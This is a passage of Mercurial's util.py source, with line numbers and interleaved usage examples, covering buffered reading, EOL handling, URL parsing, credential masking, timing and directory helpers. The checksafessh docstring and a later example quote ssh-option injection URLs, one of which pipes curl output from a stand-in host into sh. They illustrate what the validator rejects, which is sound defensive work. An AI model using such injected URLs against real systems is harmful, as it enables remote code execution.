2346 Returns less than L bytes if the iterator runs dry.
2347
2348 If size parameter is omitted, read everything"""
2349 if l is None:
2350 return ''.join(self.iter)
2351
2352 left = l
2353 buf = []
2354 queue = self._queue
2355 while left > 0:
2356 # refill the queue
2357 if not queue:
2358 target = 2**18
2359 for chunk in self.iter:
2360 queue.append(chunk)
2361 target -= len(chunk)
2362 if target <= 0:
2363 break
2364 if not queue:
2365 break
2366
2367 # The easy way to do this would be to queue.popleft(), modify the
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 # where we read partial chunk content, this incurs 2 dequeue
2370 # mutations and creates a new str for the remaining chunk in the
2371 # queue. Our code below avoids this overhead.
2372
2373 chunk = queue[0]
2374 chunkl = len(chunk)
2375 offset = self._chunkoffset
2376
2377 # Use full chunk.
2378 if offset == 0 and left >= chunkl:
2379 left -= chunkl
2380 queue.popleft()
2381 buf.append(chunk)
2382 # self._chunkoffset remains at 0.
2383 continue
2384
2385 chunkremaining = chunkl - offset
2386
2387 # Use all of unconsumed part of chunk.
2388 if left >= chunkremaining:
2389 left -= chunkremaining
2390 queue.popleft()
2391 # offset == 0 is enabled by block above, so this won't merely
2392 # copy via ``chunk[0:]``.
2393 buf.append(chunk[offset:])
2394 self._chunkoffset = 0
2395
2396 # Partial chunk needed.
2397 else:
2398 buf.append(chunk[offset:offset + left])
2399 self._chunkoffset += left
2400 left -= chunkremaining
2401
2402 return ''.join(buf)
2403
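For example (invented chunks), uneven input pieces can be consumed in exact-size reads:

buf = chunkbuffer(iter([b'he', b'llo, ', b'world']))
assert buf.read(5) == b'hello'
assert buf.read(7) == b', world'
assert buf.read(1) == b''      # the iterator has run dry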
2404 def filechunkiter(f, size=131072, limit=None):
2405 """Create a generator that produces the data in the file size
2406 (default 131072) bytes at a time, up to optional limit (default is
2407 to read all data). Chunks may be less than size bytes if the
2408 chunk is the last chunk in the file, or the file is a socket or
2409 some other type of file that sometimes reads less data than is
2410 requested."""
2411 assert size >= 0
2412 assert limit is None or limit >= 0
2413 while True:
2414 if limit is None:
2415 nbytes = size
2416 else:
2417 nbytes = min(limit, size)
2418 s = nbytes and f.read(nbytes)
2419 if not s:
2420 break
2421 if limit:
2422 limit -= len(s)
2423 yield s
2424
2425 class cappedreader(object):
2426 """A file object proxy that allows reading up to N bytes.
2427
2428 Given a source file object, instances of this type allow reading up to
2429 N bytes from that source file object. Attempts to read past the allowed
2430 limit are treated as EOF.
2431
2432 It is assumed that I/O is not performed on the original file object
2433 in addition to I/O that is performed by this instance. If there is,
2434 state tracking will get out of sync and unexpected results will ensue.
2435 """
2436 def __init__(self, fh, limit):
2437 """Allow reading up to <limit> bytes from <fh>."""
2438 self._fh = fh
2439 self._left = limit
2440
2441 def read(self, n=-1):
2442 if not self._left:
2443 return b''
2444
2445 if n < 0:
2446 n = self._left
2447
2448 data = self._fh.read(min(n, self._left))
2449 self._left -= len(data)
2450 assert self._left >= 0
2451
2452 return data
2453
2454 def readinto(self, b):
2455 res = self.read(len(b))
2456 if res is None:
2457 return None
2458
2459 b[0:len(res)] = res
2460 return len(res)
2461
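A sketch with an in-memory stream: after the 4-byte budget is spent, the capped reader reports EOF while the source file object still holds more data.

import io

fh = io.BytesIO(b'0123456789')
capped = cappedreader(fh, 4)
assert capped.read() == b'0123'
assert capped.read() == b''      # limit reached, treated as EOF
assert fh.read() == b'456789'    # source only advanced 4 bytes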
2462 def unitcountfn(*unittable):
2463 '''return a function that renders a readable count of some quantity'''
2464
2465 def go(count):
2466 for multiplier, divisor, format in unittable:
2467 if abs(count) >= divisor * multiplier:
2468 return format % (count / float(divisor))
2469 return unittable[-1][2] % count
2470
2471 return go
2472
2473 def processlinerange(fromline, toline):
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 0-based range.
2476
2477 >>> processlinerange(10, 20)
2478 (9, 20)
2479 >>> processlinerange(2, 1)
2480 Traceback (most recent call last):
2481 ...
2482 ParseError: line range must be positive
2483 >>> processlinerange(0, 5)
2484 Traceback (most recent call last):
2485 ...
2486 ParseError: fromline must be strictly positive
2487 """
2488 if toline - fromline < 0:
2489 raise error.ParseError(_("line range must be positive"))
2490 if fromline < 1:
2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 return fromline - 1, toline
2493
2494 bytecount = unitcountfn(
2495 (100, 1 << 30, _('%.0f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2498 (100, 1 << 20, _('%.0f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2501 (100, 1 << 10, _('%.0f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2504 (1, 1, _('%.0f bytes')),
2505 )
2506
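Worked examples traced from the table above (assuming untranslated messages): the first row whose threshold the value reaches decides both the unit and the precision.

assert bytecount(500) == '500 bytes'
assert bytecount(1234567) == '1.18 MB'    # >= 1 MiB, so two decimals
assert bytecount(5 << 30) == '5.00 GB'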
2507 class transformingwriter(object):
2508 """Writable file wrapper to transform data by function"""
2509
2510 def __init__(self, fp, encode):
2511 self._fp = fp
2512 self._encode = encode
2513
2514 def close(self):
2515 self._fp.close()
2516
2517 def flush(self):
2518 self._fp.flush()
2519
2520 def write(self, data):
2521 return self._fp.write(self._encode(data))
2522
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 # stray CR is an error.
2526 _eolre = remod.compile(br'\r*\n')
2527
2528 def tolf(s):
2529 return _eolre.sub('\n', s)
2530
2531 def tocrlf(s):
2532 return _eolre.sub('\r\n', s)
2533
2534 def _crlfwriter(fp):
2535 return transformingwriter(fp, tocrlf)
2536
2537 if pycompat.oslinesep == '\r\n':
2538 tonativeeol = tocrlf
2539 fromnativeeol = tolf
2540 nativeeolwriter = _crlfwriter
2541 else:
2542 tonativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2545
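For example (illustrative strings): tolf collapses CRLF, including stray repeated CRs, down to LF; tocrlf performs the reverse mapping; and tonativeeol/fromnativeeol resolve to whichever pair matches the platform.

assert tolf('a\r\nb\n') == 'a\nb\n'
assert tolf('a\r\r\nb\n') == 'a\nb\n'      # repeated CRs are removed
assert tocrlf('a\nb\n') == 'a\r\nb\r\n'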
2546 if (pyplatform.python_implementation() == 'CPython' and
2547 sys.version_info < (3, 0)):
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 # correctly. The following table shows what CPython version (and functions)
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 #
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 # --------------------------------------------------
2554 # fp.__iter__ | buggy | buggy | okay
2555 # fp.read* | buggy | okay [1] | okay
2556 #
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 #
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 #
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 # fp.__iter__ but not other fp.read* methods.
2566 #
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 # to minimize the performance impact.
2572 if sys.version_info >= (2, 7, 4):
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 def _safeiterfile(fp):
2575 return iter(fp.readline, '')
2576 else:
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 # note: this may block longer than necessary because of bufsize.
2579 def _safeiterfile(fp, bufsize=4096):
2580 fd = fp.fileno()
2581 line = ''
2582 while True:
2583 try:
2584 buf = os.read(fd, bufsize)
2585 except OSError as ex:
2586 # os.read only raises EINTR before any data is read
2587 if ex.errno == errno.EINTR:
2588 continue
2589 else:
2590 raise
2591 line += buf
2592 if '\n' in buf:
2593 splitted = line.splitlines(True)
2594 line = ''
2595 for l in splitted:
2596 if l[-1] == '\n':
2597 yield l
2598 else:
2599 line = l
2600 if not buf:
2601 break
2602 if line:
2603 yield line
2604
2605 def iterfile(fp):
2606 fastpath = True
2607 if type(fp) is file:
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 if fastpath:
2610 return fp
2611 else:
2612 return _safeiterfile(fp)
2613 else:
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 def iterfile(fp):
2616 return fp
2617
2618 def iterlines(iterator):
2619 for chunk in iterator:
2620 for line in chunk.splitlines():
2621 yield line
2622
2623 def expandpath(path):
2624 return os.path.expanduser(os.path.expandvars(path))
2625
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 """Return the result of interpolating items in the mapping into string s.
2628
2629 prefix is a single character string, or a two character string with
2630 a backslash as the first character if the prefix needs to be escaped in
2631 a regular expression.
2632
2633 fn is an optional function that will be applied to the replacement text
2634 just before replacement.
2635
2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 its escaping.
2638 """
2639 fn = fn or (lambda s: s)
2640 patterns = '|'.join(mapping.keys())
2641 if escape_prefix:
2642 patterns += '|' + prefix
2643 if len(prefix) > 1:
2644 prefix_char = prefix[1:]
2645 else:
2646 prefix_char = prefix
2647 mapping[prefix_char] = prefix_char
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2650
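A sketch of the simple (non-escaped) case with an invented mapping: each prefix-plus-key occurrence is replaced, with fn applied to the replacement text first.

s = interpolate('%', {'user': 'alice'}, 'hello %user')
assert s == 'hello alice'
s = interpolate('%', {'user': 'alice'}, 'HELLO %user',
                fn=lambda t: t.upper())
assert s == 'HELLO ALICE'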
2651 def getport(port):
2652 """Return the port for a given network service.
2653
2654 If port is an integer, it's returned as is. If it's a string, it's
2655 looked up using socket.getservbyname(). If there's no matching
2656 service, error.Abort is raised.
2657 """
2658 try:
2659 return int(port)
2660 except ValueError:
2661 pass
2662
2663 try:
2664 return socket.getservbyname(pycompat.sysstr(port))
2665 except socket.error:
2666 raise error.Abort(_("no port number associated with service '%s'")
2667 % port)
2668
2669 class url(object):
2670 r"""Reliable URL parser.
2671
2672 This parses URLs and provides attributes for the following
2673 components:
2674
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676
2677 Missing components are set to None. The only exception is
2678 fragment, which is set to '' if present but empty.
2679
2680 If parsefragment is False, fragment is included in query. If
2681 parsequery is False, query is included in path. If both are
2682 False, both fragment and query are included in path.
2683
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685
2686 Note that for backward compatibility reasons, bundle URLs do not
2687 take host names. That means 'bundle://../' has a path of '../'.
2688
2689 Examples:
2690
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 >>> url(b'file:///home/joe/repo')
2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 >>> url(b'file:///c:/temp/foo/')
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 >>> url(b'bundle:foo')
2700 <url scheme: 'bundle', path: 'foo'>
2701 >>> url(b'bundle://../foo')
2702 <url scheme: 'bundle', path: '../foo'>
2703 >>> url(br'c:\foo\bar')
2704 <url path: 'c:\\foo\\bar'>
2705 >>> url(br'\\blah\blah\blah')
2706 <url path: '\\\\blah\\blah\\blah'>
2707 >>> url(br'\\blah\blah\blah#baz')
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 >>> url(br'file:///C:\users\me')
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711
2712 Authentication credentials:
2713
2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 >>> url(b'ssh://joe@x/repo')
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718
2719 Query strings and fragments:
2720
2721 >>> url(b'http://host/a?b#c')
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725
2726 Empty path:
2727
2728 >>> url(b'')
2729 <url path: ''>
2730 >>> url(b'#a')
2731 <url path: '', fragment: 'a'>
2732 >>> url(b'http://host/')
2733 <url scheme: 'http', host: 'host', path: ''>
2734 >>> url(b'http://host/#a')
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736
2737 Only scheme:
2738
2739 >>> url(b'http:')
2740 <url scheme: 'http'>
2741 """
2742
2743 _safechars = "!~*'()+"
2744 _safepchars = "/!~*'()+:\\"
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 # We slowly chomp away at path until we have only the path left
2749 self.scheme = self.user = self.passwd = self.host = None
2750 self.port = self.path = self.query = self.fragment = None
2751 self._localpath = True
2752 self._hostport = ''
2753 self._origpath = path
2754
2755 if parsefragment and '#' in path:
2756 path, self.fragment = path.split('#', 1)
2757
2758 # special case for Windows drive letters and UNC paths
2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 self.path = path
2761 return
2762
2763 # For compatibility reasons, we can't handle bundle paths as
2764 # normal URLS
2765 if path.startswith('bundle:'):
2766 self.scheme = 'bundle'
2767 path = path[7:]
2768 if path.startswith('//'):
2769 path = path[2:]
2770 self.path = path
2771 return
2772
2773 if self._matchscheme(path):
2774 parts = path.split(':', 1)
2775 if parts[0]:
2776 self.scheme, path = parts
2777 self._localpath = False
2778
2779 if not path:
2780 path = None
2781 if self._localpath:
2782 self.path = ''
2783 return
2784 else:
2785 if self._localpath:
2786 self.path = path
2787 return
2788
2789 if parsequery and '?' in path:
2790 path, self.query = path.split('?', 1)
2791 if not path:
2792 path = None
2793 if not self.query:
2794 self.query = None
2795
2796 # // is required to specify a host/authority
2797 if path and path.startswith('//'):
2798 parts = path[2:].split('/', 1)
2799 if len(parts) > 1:
2800 self.host, path = parts
2801 else:
2802 self.host = parts[0]
2803 path = None
2804 if not self.host:
2805 self.host = None
2806 # path of file:///d is /d
2807 # path of file:///d:/ is d:/, not /d:/
2808 if path and not hasdriveletter(path):
2809 path = '/' + path
2810
2811 if self.host and '@' in self.host:
2812 self.user, self.host = self.host.rsplit('@', 1)
2813 if ':' in self.user:
2814 self.user, self.passwd = self.user.split(':', 1)
2815 if not self.host:
2816 self.host = None
2817
2818 # Don't split on colons in IPv6 addresses without ports
2819 if (self.host and ':' in self.host and
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 self._hostport = self.host
2822 self.host, self.port = self.host.rsplit(':', 1)
2823 if not self.host:
2824 self.host = None
2825
2826 if (self.host and self.scheme == 'file' and
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829
2830 self.path = path
2831
2832 # leave the query string escaped
2833 for a in ('user', 'passwd', 'host', 'port',
2834 'path', 'fragment'):
2835 v = getattr(self, a)
2836 if v is not None:
2837 setattr(self, a, urlreq.unquote(v))
2838
2839 @encoding.strmethod
2840 def __repr__(self):
2841 attrs = []
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 'query', 'fragment'):
2844 v = getattr(self, a)
2845 if v is not None:
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 return '<url %s>' % ', '.join(attrs)
2848
2849 def __bytes__(self):
2850 r"""Join the URL's components back into a URL string.
2851
2852 Examples:
2853
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 >>> bytes(url(b'http://localhost:80//'))
2863 'http://localhost:80//'
2864 >>> bytes(url(b'http://localhost:80/'))
2865 'http://localhost:80/'
2866 >>> bytes(url(b'http://localhost:80'))
2867 'http://localhost:80/'
2868 >>> bytes(url(b'bundle:foo'))
2869 'bundle:foo'
2870 >>> bytes(url(b'bundle://../foo'))
2871 'bundle:../foo'
2872 >>> bytes(url(b'path'))
2873 'path'
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 'file:///tmp/foo/bar'
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 'file:///c:/tmp/foo/bar'
2878 >>> print(url(br'bundle:foo\bar'))
2879 bundle:foo\bar
2880 >>> print(url(br'file:///D:\data\hg'))
2881 file:///D:\data\hg
2882 """
2883 if self._localpath:
2884 s = self.path
2885 if self.scheme == 'bundle':
2886 s = 'bundle:' + s
2887 if self.fragment:
2888 s += '#' + self.fragment
2889 return s
2890
2891 s = self.scheme + ':'
2892 if self.user or self.passwd or self.host:
2893 s += '//'
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 or hasdriveletter(self.path)):
2896 s += '//'
2897 if hasdriveletter(self.path):
2898 s += '/'
2899 if self.user:
2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 if self.passwd:
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 if self.user or self.passwd:
2904 s += '@'
2905 if self.host:
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 s += urlreq.quote(self.host)
2908 else:
2909 s += self.host
2910 if self.port:
2911 s += ':' + urlreq.quote(self.port)
2912 if self.host:
2913 s += '/'
2914 if self.path:
2915 # TODO: similar to the query string, we should not unescape the
2916 # path when we store it, the path might contain '%2f' = '/',
2917 # which we should *not* escape.
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 if self.query:
2920 # we store the query in escaped form.
2921 s += '?' + self.query
2922 if self.fragment is not None:
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 return s
2925
2926 __str__ = encoding.strmethod(__bytes__)
2927
2928 def authinfo(self):
2929 user, passwd = self.user, self.passwd
2930 try:
2931 self.user, self.passwd = None, None
2932 s = bytes(self)
2933 finally:
2934 self.user, self.passwd = user, passwd
2935 if not self.user:
2936 return (s, None)
2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 # URIs must not contain credentials. The host is passed in the
2939 # URIs list because Python < 2.4.3 uses only that to search for
2940 # a password.
2941 return (s, (None, (s, self.host),
2942 self.user, self.passwd or ''))
2943
2944 def isabs(self):
2945 if self.scheme and self.scheme != 'file':
2946 return True # remote URL
2947 if hasdriveletter(self.path):
2948 return True # absolute for our purposes - can't be joined()
2949 if self.path.startswith(br'\\'):
2950 return True # Windows UNC path
2951 if self.path.startswith('/'):
2952 return True # POSIX-style
2953 return False
2954
2955 def localpath(self):
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 path = self.path or '/'
2958 # For Windows, we need to promote hosts containing drive
2959 # letters to paths with drive letters.
2960 if hasdriveletter(self._hostport):
2961 path = self._hostport + '/' + self.path
2962 elif (self.host is not None and self.path
2963 and not hasdriveletter(path)):
2964 path = '/' + path
2965 return path
2966 return self._origpath
2967
2968 def islocal(self):
2969 '''whether localpath will return something that posixfile can open'''
2970 return (not self.scheme or self.scheme == 'file'
2971 or self.scheme == 'bundle')
2972
2973 def hasscheme(path):
2974 return bool(url(path).scheme)
2975
2976 def hasdriveletter(path):
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978
2979 def urllocalpath(path):
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981
2982 def checksafessh(path):
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 Let's reject these potentially exploitable urls entirely and warn the
2988 user.
2989
2990 Raises an error.Abort when the url is unsafe.
2991 """
2992 path = urlreq.unquote(path)
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 (pycompat.bytestr(path),))
2996
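A quick sketch of how this check behaves in practice, assuming mercurial.util and mercurial.error are importable (byte strings throughout, as elsewhere in this module):

    from mercurial import error, util

    util.checksafessh(b'ssh://example.com/repo')   # fine: host does not begin with '-'
    try:
        # the leading '-' would otherwise be parsed by ssh as an option
        util.checksafessh(b'ssh://-oProxyCommand=touch${IFS}owned/x')
    except error.Abort:
        pass                                       # rejected, as intended
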
2997 def hidepassword(u):
2998 '''hide user credential in a url string'''
2999 u = url(u)
3000 if u.passwd:
3001 u.passwd = '***'
3002 return bytes(u)
3003
3004 def removeauth(u):
3005 '''remove all authentication information from a url string'''
3006 u = url(u)
3007 u.user = u.passwd = None
3008 return bytes(u)
3009
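For illustration, a minimal usage sketch of the url helpers above; the expected byte strings follow from __bytes__ as defined earlier, but treat this as a sketch rather than authoritative output:

    from mercurial import util

    u = util.url(b'https://alice:secret@example.com:8443/repo?style=raw')
    assert u.user == b'alice' and u.host == b'example.com' and u.port == b'8443'

    # hidepassword() keeps the user name but masks the password
    assert (util.hidepassword(b'https://alice:secret@example.com/repo')
            == b'https://alice:***@example.com/repo')

    # removeauth() strips both the user name and the password
    assert (util.removeauth(b'https://alice:secret@example.com/repo')
            == b'https://example.com/repo')
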
3010 timecount = unitcountfn(
3011 (1, 1e3, _('%.0f s')),
3012 (100, 1, _('%.1f s')),
3013 (10, 1, _('%.2f s')),
3014 (1, 1, _('%.3f s')),
3015 (100, 0.001, _('%.1f ms')),
3016 (10, 0.001, _('%.2f ms')),
3017 (1, 0.001, _('%.3f ms')),
3018 (100, 0.000001, _('%.1f us')),
3019 (10, 0.000001, _('%.2f us')),
3020 (1, 0.000001, _('%.3f us')),
3021 (100, 0.000000001, _('%.1f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3024 )
3025
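timecount is built by unitcountfn (defined earlier in this module), which formats a value using the first table row whose threshold, the first element times the second, the value reaches. A few hedged examples of the resulting formatting:

    timecount(2.5)     # -> '2.500 s'  (first matching row: (1, 1, '%.3f s'))
    timecount(42.0)    # -> '42.00 s'  (first matching row: (10, 1, '%.2f s'))
    timecount(0.0015)  # -> '1.500 ms' (first matching row: (1, 0.001, '%.3f ms'))
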
3026 @attr.s
3027 class timedcmstats(object):
3028 """Stats information produced by the timedcm context manager on entering."""
3029
3030 # the starting value of the timer as a float (meaning and resolution are
3031 # platform dependent, see util.timer)
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 # the context is exited.
3035 elapsed = attr.ib(default=0)
3036 # the number of nested timedcm context managers.
3037 level = attr.ib(default=1)
3038
3039 def __bytes__(self):
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041
3042 __str__ = encoding.strmethod(__bytes__)
3043
3044 @contextlib.contextmanager
3045 def timedcm(whencefmt, *whenceargs):
3046 """A context manager that produces timing information for a given context.
3047
3048 On entering, a timedcmstats instance is produced.
3049
3050 This context manager is reentrant.
3051
3052 """
3053 # track nested context managers
3054 timedcm._nested += 1
3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 try:
3057 with tracing.log(whencefmt, *whenceargs):
3058 yield timing_stats
3059 finally:
3060 timing_stats.elapsed = timer() - timing_stats.start
3061 timedcm._nested -= 1
3062
3063 timedcm._nested = 0
3064
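A minimal usage sketch; the label and the timed call below are made up for illustration:

    with timedcm(b'loading %s', b'manifest') as stats:
        load_manifest()          # placeholder for the work being timed
    # stats.elapsed is filled in on exit; bytes(stats) goes through timecount
    print(bytes(stats))          # e.g. '182.0 ms'
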
3065 def timed(func):
3066 '''Report the execution time of a function call to stderr.
3067
3068 During development, use as a decorator when you need to measure
3069 the cost of a function, e.g. as follows:
3070
3071 @util.timed
3072 def foo(a, b, c):
3073 pass
3074 '''
3075
3076 def wrapper(*args, **kwargs):
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 result = func(*args, **kwargs)
3079 stderr = procutil.stderr
3080 stderr.write('%s%s: %s\n' % (
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 time_stats))
3083 return result
3084 return wrapper
3085
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088
3089 def sizetoint(s):
3090 '''Convert a size specifier to a byte count.
3091
3092 >>> sizetoint(b'30')
3093 30
3094 >>> sizetoint(b'2.2kb')
3095 2252
3096 >>> sizetoint(b'6M')
3097 6291456
3098 '''
3099 t = s.strip().lower()
3100 try:
3101 for k, u in _sizeunits:
3102 if t.endswith(k):
3103 return int(float(t[:-len(k)]) * u)
3104 return int(t)
3105 except ValueError:
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107
3108 class hooks(object):
3109 '''A collection of hook functions that can be used to extend a
3110 function's behavior. Hooks are called in lexicographic order,
3111 based on the names of their sources.'''
3112
3113 def __init__(self):
3114 self._hooks = []
3115
3116 def add(self, source, hook):
3117 self._hooks.append((source, hook))
3118
3119 def __call__(self, *args):
3120 self._hooks.sort(key=lambda x: x[0])
3121 results = []
3122 for source, hook in self._hooks:
3123 results.append(hook(*args))
3124 return results
3125
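A small sketch of the ordering guarantee (sources are sorted lexicographically before every call):

    h = hooks()
    h.add(b'zz-ext', lambda v: v * 2)
    h.add(b'aa-ext', lambda v: v + 1)
    assert h(10) == [11, 20]   # b'aa-ext' runs first despite being added last
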
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 '''Yields lines for a nicely formatted stacktrace.
3128 Skips the last 'skip' entries, then returns the last 'depth' entries.
3129 Each file+linenumber is formatted according to fileline.
3130 Each line is formatted according to line.
3131 If line is None, it yields:
3132 length of longest filepath+line number,
3133 filepath+linenumber,
3134 function
3135
3136 Not to be used in production code, but very convenient while developing.
3137 '''
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 ][-depth:]
3141 if entries:
3142 fnmax = max(len(entry[0]) for entry in entries)
3143 for fnln, func in entries:
3144 if line is None:
3145 yield (fnmax, fnln, func)
3146 else:
3147 yield line % (fnmax, fnln, func)
3148
3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3153 By default it will flush stdout first.
3154 It can be used everywhere and intentionally does not require an ui object.
3155 Not to be used in production code, but very convenient while developing.
3156 '''
3157 if otherf:
3158 otherf.flush()
3159 f.write('%s at:\n' % msg.rstrip())
3160 for line in getstackframes(skip + 1, depth=depth):
3161 f.write(line)
3162 f.flush()
3163
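For example, dropping a line such as the following into a suspect code path prints the call stack to stderr (the message is illustrative):

    util.debugstacktrace(b'entering resolve', skip=1, depth=8)
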
3164 class dirs(object):
3165 '''a multiset of directory names from a dirstate or manifest'''
3166
3167 def __init__(self, map, skip=None):
3168 self._dirs = {}
3169 addpath = self.addpath
3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 for f, s in map.iteritems():
3172 if s[0] != skip:
3173 addpath(f)
3174 else:
3175 for f in map:
3176 addpath(f)
3177
3178 def addpath(self, path):
3179 dirs = self._dirs
3180 for base in finddirs(path):
3181 if base in dirs:
3182 dirs[base] += 1
3183 return
3184 dirs[base] = 1
3185
3186 def delpath(self, path):
3187 dirs = self._dirs
3188 for base in finddirs(path):
3189 if dirs[base] > 1:
3190 dirs[base] -= 1
3191 return
3192 del dirs[base]
3193
3194 def __iter__(self):
3195 return iter(self._dirs)
3196
3197 def __contains__(self, d):
3198 return d in self._dirs
3199
3200 if safehasattr(parsers, 'dirs'):
3201 dirs = parsers.dirs
3202
3203 def finddirs(path):
3204 pos = path.rfind('/')
3205 while pos != -1:
3206 yield path[:pos]
3207 pos = path.rfind('/', 0, pos)
3208
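A short sketch of the reference counting done by the pure-Python dirs class above (the C version from parsers is expected to behave the same way for these operations):

    # finddirs yields proper ancestors, most specific first
    assert list(finddirs(b'a/b/c')) == [b'a/b', b'a']

    d = dirs([b'a/b/c', b'a/b/d'])   # b'a/b' now has a refcount of 2
    d.delpath(b'a/b/c')
    assert b'a/b' in d               # one reference left
    d.delpath(b'a/b/d')
    assert b'a/b' not in d           # last reference dropped
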
3209 # compression code
3210
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3213
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217
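Engines advertise their wire-protocol support through this tuple: a protocol name plus server and client priorities, where higher wins and 0 disables the engine for that role. A construction sketch; the concrete values below are illustrative only:

    zstdsupport = compewireprotosupport('zstd', 50, 50)
    zlibsupport = compewireprotosupport('zlib', 20, 20)
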